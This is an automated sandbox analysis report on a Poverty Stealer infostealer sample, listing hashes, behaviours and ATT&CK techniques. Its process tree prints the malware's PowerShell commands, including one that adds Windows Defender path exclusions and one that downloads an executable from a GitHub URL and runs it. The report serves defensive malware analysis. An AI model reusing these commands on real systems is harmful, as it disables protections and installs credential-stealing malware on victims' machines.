povertystealer | 9346689e8eda0f44f2d5a66b81398e8358906c879a568038756e01d1d99c1c33

General

Target

2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe
Size

356KB
MD5

78f026bbf3872e33c80f58b2aeb5b376
SHA1

1650fd7bd7eecb5ca03bb4bca78ffb49e860eb5d
SHA256

9346689e8eda0f44f2d5a66b81398e8358906c879a568038756e01d1d99c1c33
SHA512

890c0302f21869b488cc39518855a37214b5649729c9b880e114944b8bf0c2dbac7889928ab3c493d6d04428032328f9090ef42274d1f5918abf7779a78b9202
SSDEEP

6144:Mrgjoi8Suh6lw+JA+ZsP3Z8sJuZWLFUosnPs++:Mi8bh6Ch+ZsPpzuZWeosn

Score

10^/10

povertystealer discovery execution spyware stealer

Malware Config

Signatures

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000800000001e6d7-33.dat	family_povertystealer

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer

Blocklisted process makes network request 2 IoCs

flow	pid	Process
32	4720	powershell.exe
34	4720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4656	powershell.exe
4720	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
34	4720	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe

Executes dropped EXE 1 IoCs

pid	Process
3708	grahdjgd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
33	raw.githubusercontent.com
34	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	grahdjgd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1896 wrote to memory of 4480	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	95
PID 1896 wrote to memory of 4480	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	95
PID 4480 wrote to memory of 4656	4480	cmd.exe	96
PID 4480 wrote to memory of 4656	4480	cmd.exe	96
PID 1896 wrote to memory of 5960	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	99
PID 1896 wrote to memory of 5960	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	99
PID 5960 wrote to memory of 4720	5960	cmd.exe	100
PID 5960 wrote to memory of 4720	5960	cmd.exe	100
PID 1896 wrote to memory of 3708	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	102
PID 1896 wrote to memory of 3708	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	102
PID 1896 wrote to memory of 3708	1896	2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe	102

C:\Users\Admin\AppData\Local\Temp\2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-31_78f026bbf3872e33c80f58b2aeb5b376_black-basta_cobalt-strike_satacom.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\bulypacetbz', 'C:\Users', 'C:\ProgramData'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\bulypacetbz', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/loptyiopppasss.exe' -OutFile 'C:\Users\Admin\AppData\Local\bulypacetbz\grahdjgd.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/loptyiopppasss.exe' -OutFile 'C:\Users\Admin\AppData\Local\bulypacetbz\grahdjgd.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- C:\Users\Admin\AppData\Local\bulypacetbz\grahdjgd.exe
  "C:\Users\Admin\AppData\Local\bulypacetbz\grahdjgd.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b1761516efb31557634d783c4ba6c78a

SHA1
2e1cb494796983fab11ac5f1630940e1ced086f0

SHA256
ad4681b1a04a894525509b5614891dd373c06da7f971296b6adb5d69ddf7b5b9

SHA512
42c93285e870463dd10c8f3eca15fe83b8e6c0a2231f67e3c3d0d257044e4b035a09be64680558aa03bf8daafcbf8824550625d74cbd6ee95ca8a31bca5b6c0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uy1zsewp.lx3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\bulypacetbz\grahdjgd.exe

Filesize
29KB

MD5
36bd19a3c7ba9fec06bef79a7dafb9a2

SHA1
946cb3e20f5cbd1ef39226b3ea0154a98aad6920

SHA256
e5684da4c63e798db519689da67bbb49d08a9daaae449ead0f271ef729f75ded

SHA512
ca5d1b7b15cafb97976b6fe53c407aed25494018c7b89f97514fc2290214a555db0a7a60f8d906d12857628a6aaef54bd4eb57e0a4da631e0a3d989dacbe6fa6

Download Submit
memory/4656-11-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4656-15-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4656-12-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4656-0-0x00007FF84FBA3000-0x00007FF84FBA5000-memory.dmp

Filesize
8KB

Download
memory/4656-1-0x000001D5B7B00000-0x000001D5B7B22000-memory.dmp

Filesize
136KB

Download
memory/4720-17-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4720-18-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4720-28-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download
memory/4720-32-0x00007FF84FBA0000-0x00007FF850661000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing